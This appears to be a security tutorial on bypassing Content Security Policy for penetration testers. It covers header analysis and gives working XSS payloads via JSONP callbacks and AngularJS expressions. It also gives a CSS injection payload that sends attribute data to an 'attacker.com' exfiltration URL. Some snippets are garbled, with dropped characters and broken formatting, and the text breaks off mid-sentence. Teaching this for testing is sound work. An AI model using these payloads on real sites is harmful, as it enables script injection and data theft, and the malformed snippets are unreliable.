Listen to this Post

Introduction:
Content Security Policy (CSP) has long been a critical defense mechanism against Cross-Site Scripting (XSS) attacks, acting as a whitelist for allowed content sources. However, a new tool, CSPBypass.com, is shifting the balance, providing red teams and ethical hackers with a systematic method to test and bypass inadequately configured CSPs. This article delves into the technical intricacies of CSP bypasses, equipping security professionals with the knowledge to rigorously assess an application’s true resilience.
Learning Objectives:
- Understand the common misconfigurations in CSP headers that lead to successful bypasses.
- Learn to utilize the CSPBypass.com tool and manual techniques to identify exploitable CSP weaknesses.
- Develop the skills to craft proof-of-concept XSS payloads that evade restrictive CSP directives.
You Should Know:
1. Deconstructing Content Security Policy Headers
A CSP is delivered via an HTTP response header. The first step in bypassing it is to understand its directives.
Content-Security-Policy: default-src 'self'; script-src 'self' https://trusted.cdn.com; object-src 'none'; style-src 'self' 'unsafe-inline'
Step-by-step guide:
This header defines the policy. `default-src ‘self’` means only the same origin is allowed for most resources. `script-src` allows scripts from the same origin and `https://trusted.cdn.com`. `object-src ‘none’` blocks all plugins. `style-src` allows inline styles. The presence of `’unsafe-inline’` for scripts or styles is a common weakness. To audit, use your browser’s developer console (F12) to view the `Network` tab and inspect the response headers for the `Content-Security-Policy` field.
2. Leveraging CSPBypass.com for Automated Analysis
CSPBypass.com automates the initial reconnaissance phase. You provide a target URL, and it analyzes the CSP for known bypass patterns.
The tool itself is a web service, but its methodology can be scripted for reconnaissance. curl -I https://target-app.com | grep -i content-security-policy
Step-by-step guide:
Navigate to https://cspbypass.com`. Enter the target URL. The tool will fetch the CSP and run it against a database of misconfigurations and known bypasses for specific directives likescript-src,style-src, andfont-src`. It provides a report highlighting potential weak spots, such as overly permissive wildcards or the use of the `’unsafe-eval’` directive.
3. Exploiting Whitelisted JSONP Endpoints
Many CSPs whitelist domains like Google APIs or CDNs for scripts. These domains often host JSONP (JSON with Padding) endpoints, which can be abused to execute arbitrary code.
<!-- If https://trusted-api.com is whitelisted in script-src --> <script src="https://trusted-api.com/jsonp?callback=alert(document.domain)//"></script>
Step-by-step guide:
Identify a whitelisted domain in the `script-src` directive. Research known JSONP endpoints on that domain. Craft a script tag pointing to that endpoint, using a parameter like `callback` or `cb` to inject your JavaScript payload. The endpoint will reflect your payload inside a script tag, effectively bypassing the CSP and executing your code.
4. Abusing AngularJS Libraries in `script-src`
If a whitelisted domain hosts an AngularJS library, and the application uses it, you can use AngularJS expressions to execute JavaScript without the need for a `script` tag.
<!-- If AngularJS is loaded from a whitelisted CDN -->
<div ng-app>
{{ $eval.constructor('alert(1)')() }}
</div>
Step-by-step guide:
Confirm the presence of AngularJS on the target page and that its source is from a CSP-whitelisted domain. Inject an element with the `ng-app` directive to auto-bootstrap Angular. Use an expression that calls the `$eval.constructor` function to create a new JavaScript function from a string and immediately execute it, achieving XSS.
- Bypassing `style-src` with CSS Injection and Data Exfiltration
A lax `style-src` directive can be exploited for data exfiltration, even if `script-src` is secure.<!-- If style-src allows 'unsafe-inline' --> <style> attribute^="user"] { background: url(https://attacker.com/exfil/?a); } </style>
Step-by-step guide:
Identify an injection point that reflects into an HTML attribute (e.g., class, id). Craft a CSS attribute selector that matches the attribute’s value character-by-character. For each character, set a background URL that points to your attacker-controlled server, including the exfiltrated character as a parameter. As the browser loads these resources, you can reconstruct the secret value from your server logs.
6. The Dangers of `default-src` and Wildcard Misconfigurations
A common critical error is setting a broad `default-src` or using wildcards (“) for powerful directives.
Content-Security-Policy: default-src 'unsafe-inline'; script-src https://cdnjs.cloudflare.com
Step-by-step guide:
This policy is highly vulnerable. The `default-src ` allows scripts, objects, and other resources from any origin, rendering the more specific `script-src` directive ineffective in many older browsers. You can simply host your malicious script on any server and include it with a standard `